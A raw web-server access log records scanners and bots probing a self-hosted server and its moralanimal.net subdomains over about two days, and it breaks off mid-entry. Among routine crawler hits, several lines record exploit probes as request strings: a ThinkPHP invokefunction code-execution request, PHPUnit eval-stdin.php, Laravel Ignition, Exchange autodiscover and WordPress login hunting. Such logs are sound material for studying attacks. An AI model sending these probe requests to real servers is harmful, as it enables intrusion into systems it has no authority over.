"/actuator/health" [Client 192.241.207.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Aug/2021:21:08:15 +0000] 400 - GET http localhost "/recordings/theme/main.css" [Client 77.247.108.81] [Length 154] [Gzip -] "gbrmss/7.29.0" "-" [31/Aug/2021:21:42:40 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Aug/2021:21:42:40 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Aug/2021:22:02:07 +0000] 400 - - http localhost "-" [Client 191.96.168.182] [Length 154] [Gzip -] "-" "-" [31/Aug/2021:22:13:56 +0000] 444 - GET https agent.moralanimal.net "/home/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [31/Aug/2021:22:38:16 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.207.51] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Aug/2021:22:44:11 +0000] 444 - GET https localhost "/api/v1/device/check?screen=true" [Client 109.248.6.132] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [31/Aug/2021:22:50:01 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.218.167] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Aug/2021:23:12:04 +0000] 444 - GET https agent.moralanimal.net "/cms/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [31/Aug/2021:23:19:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Aug/2021:23:21:20 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.107] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Aug/2021:23:21:22 +0000] 444 - GET https agent.moralanimal.net "/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [31/Aug/2021:23:55:51 +0000] 444 - GET https agent.moralanimal.net "/en/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:00:15:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:00:28:13 +0000] 444 - GET https localhost "/" [Client 47.241.237.67] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:00:28:14 +0000] 444 - OPTIONS https localhost "/" [Client 47.241.237.67] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:00:28:15 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.241.237.67] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:00:28:16 +0000] 400 - - https localhost "-" [Client 47.241.237.67] [Length 154] [Gzip -] "-" "-" [01/Sep/2021:00:28:22 +0000] 400 - - https localhost "-" [Client 47.241.237.67] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:00:28:23 +0000] 400 - - https localhost "-" [Client 47.241.237.67] [Length 154] [Gzip -] "-" "-" [01/Sep/2021:00:28:24 +0000] 400 - - https localhost "-" [Client 47.241.237.67] [Length 154] [Gzip -] "-" "-" [01/Sep/2021:00:28:25 +0000] 400 - - https localhost "-" [Client 47.241.237.67] [Length 154] [Gzip -] "-" "-" [01/Sep/2021:00:28:26 +0000] 400 - - https localhost "-" [Client 47.241.237.67] [Length 154] [Gzip -] "-" "-" [01/Sep/2021:00:28:27 +0000] 400 - - https localhost "-" [Client 47.241.237.67] [Length 154] [Gzip -] "-" "-" [01/Sep/2021:00:28:28 +0000] 400 - - https localhost "-" [Client 47.241.237.67] [Length 154] [Gzip -] "-" "-" [01/Sep/2021:00:28:47 +0000] 444 - GET https 64.22.31.253 "/text4041630456125" [Client 47.241.237.67] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [01/Sep/2021:00:28:47 +0000] 400 - GET http 64.22.31.253 "/text4041630456125" [Client 47.241.237.67] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [01/Sep/2021:00:28:48 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.241.237.67] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [01/Sep/2021:00:28:49 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.241.237.67] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [01/Sep/2021:00:28:49 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.241.237.67] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [01/Sep/2021:00:28:49 +0000] 444 - GET https localhost "/" [Client 47.241.237.67] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:00:28:49 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.241.237.67] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [01/Sep/2021:00:28:49 +0000] 400 - GET http localhost "/" [Client 47.241.237.67] [Length 252] [Gzip -] "-" "-" [01/Sep/2021:00:28:50 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.241.237.67] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [01/Sep/2021:00:28:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.237.67] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:00:28:50 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.241.237.67] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [01/Sep/2021:00:28:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.241.237.67] [Length 252] [Gzip -] "-" "-" [01/Sep/2021:00:29:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.237.67] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:00:29:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.241.237.67] [Length 0] [Gzip -] "curl/7.75.0" "-" [01/Sep/2021:01:51:46 +0000] 444 - GET https agent.moralanimal.net "/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:01:54:19 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 54.183.1.22] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Sep/2021:02:53:31 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https mosquitto.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https router.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https komga.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https opds.moralanimal.net "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:02:53:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 2.57.122.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Sep/2021:03:28:41 +0000] 444 - GET https agent.moralanimal.net "/site/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:03:30:53 +0000] 444 - HEAD https 64.22.31.253 "/epa/scripts/win/nsepa_setup.exe" [Client 44.234.36.10] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Sep/2021:04:14:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Sep/2021:05:20:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.126] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Sep/2021:05:27:48 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [01/Sep/2021:05:34:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [01/Sep/2021:06:07:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Sep/2021:06:18:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [01/Sep/2021:06:48:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.65.248] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [01/Sep/2021:08:34:27 +0000] 444 - GET https agent.moralanimal.net "/new/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:08:43:44 +0000] 444 - GET https agent.moralanimal.net "/blog/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:08:53:58 +0000] 444 - GET https agent.moralanimal.net "/test/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:08:59:43 +0000] 444 - GET https agent.moralanimal.net "/wp/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:09:15:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.41] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:09:15:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.41] [Length 252] [Gzip -] "-" "-" [01/Sep/2021:09:15:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Sep/2021:09:37:38 +0000] 444 - GET https agent.moralanimal.net "/wordpress/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:10:36:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.87] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Sep/2021:10:43:43 +0000] 444 - GET https jdownloader.moralanimal.net "/blog/wp-login.php" [Client 128.140.221.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [01/Sep/2021:10:54:40 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:41 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:42 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:43 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:44 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [01/Sep/2021:10:54:45 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:45 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:46 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:47 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:10:54:47 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:12:26:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Sep/2021:14:57:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 165.227.103.50] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0/cc-prepass-https; +info@netcraft.com)" "-" [01/Sep/2021:17:01:41 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Sep/2021:17:01:41 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Sep/2021:17:01:41 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Sep/2021:17:01:41 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Sep/2021:17:01:41 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Sep/2021:17:01:42 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Sep/2021:19:07:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.43] [Length 0] [Gzip -] "-" "-" [01/Sep/2021:19:07:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "-" "-" [01/Sep/2021:19:07:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Sep/2021:21:06:27 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [01/Sep/2021:21:08:16 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.220.84] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Sep/2021:23:21:53 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.204] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Sep/2021:00:04:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.146] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [02/Sep/2021:00:05:01 +0000] 400 - - https localhost "-" [Client 185.220.102.242] [Length 154] [Gzip -] "-" "-" [02/Sep/2021:00:05:12 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.159] [Length 0] [Gzip -] "-" "-" [02/Sep/2021:00:05:15 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.159] [Length 0] [Gzip -] "-" "-" [02/Sep/2021:01:36:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [02/Sep/2021:02:22:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.66.88.100] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:52 +0000] 400 - HEAD http localhost "/" [Client 159.65.25.50] [Length 0] [Gzip -] "-" "-" [02/Sep/2021:03:22:53 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 159.65.25.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:53 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 159.65.25.50] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:53 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 159.65.25.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:53 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 159.65.25.50] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:54 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 159.65.25.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:54 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 159.65.25.50] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:54 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 159.65.25.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:54 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 159.65.25.50] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:55 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 159.65.25.50] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [02/Sep/2021:03:22:55 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 159.65.25.50] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [02/Sep/2021:03:22:55 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 159.65.25.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:03:22:56 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 159.65.25.50] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Sep/2021:05:28:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.64] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Sep/2021:06:05:12 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [02/Sep/2021:07:59:03 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@bofisa1.com/mapi/nspi/?&Email=autodiscover/autodiscover.json?@bofisa1.com" [Client 185.56.83.80] [Length 0] [Gzip -] "Firefox 203" "-" [02/Sep/2021:08:12:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [02/Sep/2021:10:04:12 +0000] 400 - - http localhost "-" [Client 91.220.163.139] [Length 154] [Gzip -] "-" "-" [02/Sep/2021:10:38:12 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Sep/2021:12:18:05 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:12:18:06 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Sep/2021:12:51:52 +0000] 444 - GET https localhost "/" [Client 109.248.6.252] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [02/Sep/2021:13:55:27 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.86.103.207] [Length 0] [Gzip -] "-" "-" [02/Sep/2021:14:07:36 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 